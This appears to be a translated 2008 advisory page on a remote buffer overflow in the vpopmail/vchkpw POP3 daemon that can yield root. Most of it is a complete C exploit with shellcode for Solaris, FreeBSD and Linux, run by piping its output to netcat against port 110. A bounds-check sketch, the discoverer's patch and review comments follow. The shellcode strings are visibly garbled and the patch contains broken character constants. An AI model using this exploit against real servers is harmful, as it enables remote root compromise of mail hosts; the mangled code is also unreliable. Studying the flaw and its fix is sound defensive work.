
Remote overflow vulnerability in vpopmail/vchkpw lets an intruder gain root privileges remotely

Category: C Programming | Published: 2008-9-24 14:37:44

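Because of a bounds-checking error in popup.c of the vpopmail/vchkpw version of the pop3d program, the program has a remotely exploitable overflow. The program is normally started as root, so a remote intruder may be able to use this vulnerability to gain root privileges on your system.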
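
A sketch of the bounds check whose absence is described above, added here as an example (it is not code from vpopmail, qmail or the patch author): each field is length-checked before it is copied into the record handed to the password checker, and an over-long USER or PASS is refused rather than truncated. The helper names, the 40-byte field limit (borrowed from the patch later on this page) and the sample values in `main` are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define MAX_FIELD  40   /* assumption: the limit used by the patch on this page */
#define RECORD_MAX 512  /* checkpassword reads at most 512 bytes from fd 3 */

/* Length of s if a NUL occurs within the first max bytes, otherwise -1. */
static long bounded_len(const char *s, size_t max)
{
    const char *end = memchr(s, '\0', max);
    return end ? (long)(end - s) : -1;
}

/* Append field and its NUL to out at *pos; -1 if over-long or no room. */
static int put_field(char *out, size_t cap, size_t *pos,
                     const char *field, size_t max)
{
    long n = bounded_len(field, max);
    if (n < 0 || (size_t)n + 1 > cap - *pos)
        return -1;
    memcpy(out + *pos, field, (size_t)n + 1);
    *pos += (size_t)n + 1;
    return 0;
}

/* Hypothetical helper (not qmail/vpopmail code): build "user\0pass\0stamp\0".
   Returns the record length, or -1 so the caller refuses the login. */
long build_auth_record(char *out, size_t cap,
                       const char *user, const char *pass, const char *stamp)
{
    size_t pos = 0;
    if (cap > RECORD_MAX)
        cap = RECORD_MAX;
    if (put_field(out, cap, &pos, user, MAX_FIELD) < 0 ||
        put_field(out, cap, &pos, pass, MAX_FIELD) < 0 ||
        put_field(out, cap, &pos, stamp, RECORD_MAX) < 0)
        return -1;
    return (long)pos;
}

int main(void)
{
    char rec[RECORD_MAX], big[300];            /* constructed sample input */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("normal login: %ld\n", build_auth_record(rec, sizeof rec, "alice", "secret", "<1.2@host>"));
    printf("over-long USER: %ld\n", build_auth_record(rec, sizeof rec, big, "secret", "<1.2@host>"));
    return 0;
}
```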

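The following code is intended only for testing and studying this vulnerability; if you use it for improper purposes, you bear the consequences yourself.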
----------------------------
/*
qmail-qpop3d-vchkpw.c (v.3)
by: K2,

The inter7 supported vchkpw/vpopmail package (replacement for chkeckpasswd)
has big problems ;)

gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
( ./vpop [offset] [alignment] ; cat ) | nc target.com 110

play with the alignment to get it to A) crash B) work.
qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
vpopmail-3.4.10a/vpopmail-3.4.11[b-e]

Hi plaguez.
prop's to Interrupt for testing with bsd, _eixon an others ;)
cheez shell's :)
THX goes out to STARBUCKS*!($#!
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 260
#define NOP 0x90
#ifdef SX86
#define DEFOFF 0x8047cfc
#define NOPDEF 75
#elif BSD
#define DEFOFF 0xbfbfdbbf
#define NOPDEF 81
#else
#define DEFOFF 0xbffffcd8
#define NOPDEF 81
#endif

char *shell =
#ifdef SX86 // Solaris IA32 shellcode, cheez
"xebx48x9axffxffxffxffx07xffxc3x5ex31xc0x89x46xb4"
"x88x46xb9x88x46x07x89x46x0cx31xc0x50xb0x8dxe8xdf"
"xffxffxffx83xc4x04x31xc0x50xb0x17xe8xd2xffxffxff"
"x83xc4x04x31xc0x50x8dx5ex08x53x8dx1ex89x5ex08x53"
"xb0x3bxe8xbbxffxffxffx83xc4x0cxe8xbbxffxffxffx2f"
"x62x69x6ex2fx73x68xffxffxffxffxffxffxffxffxff";
#elif BSD // fBSD shellcode, mudge@l0pht.com
"xebx35x5ex59x33xc0x89x46xf5x83xc8x07x66x89x46xf9"
"x8dx1ex89x5ex0bx33xd2x52x89x56x07x89x56x0fx8dx46"
"x0bx50x8dx06x50xb8x7bx56x34x12x35x40x56x34x12x51"
"x9a>:)(:<xe8xc6xffxffxff/bin/sh";
#else // Linux shellcode, no idea
"xebx22x5ex89xf3x89xf7x83xc7x07x31xc0xaa"
"x89xf9x89xf0xabx89xfax31xc0xabxb0x08x04"
"x03xcdx80x31xdbx89xd8x40xcdx80xe8xd9xff"
"xffxff/bin/shxff";
#endif

int main(int argc, char **argv)
{
int i=0,esp=0,offset=0,nop=NOPDEF;
char buffer[SIZE];

if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtol(argv[2], NULL, 0);

esp = DEFOFF;

memset(buffer, NOP, SIZE);
memcpy(buffer+nop, shell, strlen(shell));
for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
*((int *) &buffer[i]) = esp+offset;
}

printf("user %s ",buffer);
printf("pass ADMR0X&*!(#&*(! ");

fprintf(stderr," buflen = %d, nops = %d, target = 0x%x ",strlen(buffer),nop,esp+offset);
return(0);
}
--------------------------------------------------------------------


Solution:
As a temporary measure, please use this patch, released by the discoverer of the vulnerability, to patch vpopmail/vchkpw

---------------------------------------------------------------

#include "readwrite.h"
#include "timeoutread.h"
#include "timeoutwrite.h"
+#include <unistd.h>
+#include <syslog.h>

void die() { _exit(1); }

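Review bot: the second hunk calls `strlen`, but the only headers added here are `<unistd.h>` and `<syslog.h>`; if `<string.h>` is not already included above these lines, add it alongside them. Nothing in the visible lines calls `openlog`, so the new messages will be logged under the default ident and facility; setting them would make these POP3 rejections easier to filter.
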
@@ -87,6 +89,24 @@
int child;
int wstat;
int pi[2];
+
+ /*
+ This patch should have minimal impact of normal qmail operations.
+ It was coded/tested under linux, but should work most everywhere.
+ */
+
+ if(strlen(user) >= 40)
+ {
+ syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user));
+ user[39]='';
+ userlen=strlen(user);
+ }
+
+ if(strlen(pass) >= 40)
+ {
+ syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(pass));
+ pass[39]='';
+ }

if (fd_copy(2,1) == -1) die_pipe();
close(3);
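
Review bot: in both new `if` blocks the over-long `user` or `pass` is cut to 39 bytes and the login then continues, so the password checker is handed a name or password the client never sent; log the event and refuse the session instead (for example by calling the existing `die()`), which also removes the need to recompute `userlen`. The limits 40 and 39 are repeated as bare numbers with no reference to the size of the buffer they protect; a named constant tied to that buffer would make the limit checkable. `syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user))` passes a `size_t` for `%d`, so cast the value to `int` or change the format. As shown here, `user[39]='';` and `pass[39]='';` are empty character constants and will not compile; the terminator was presumably `'\0'`.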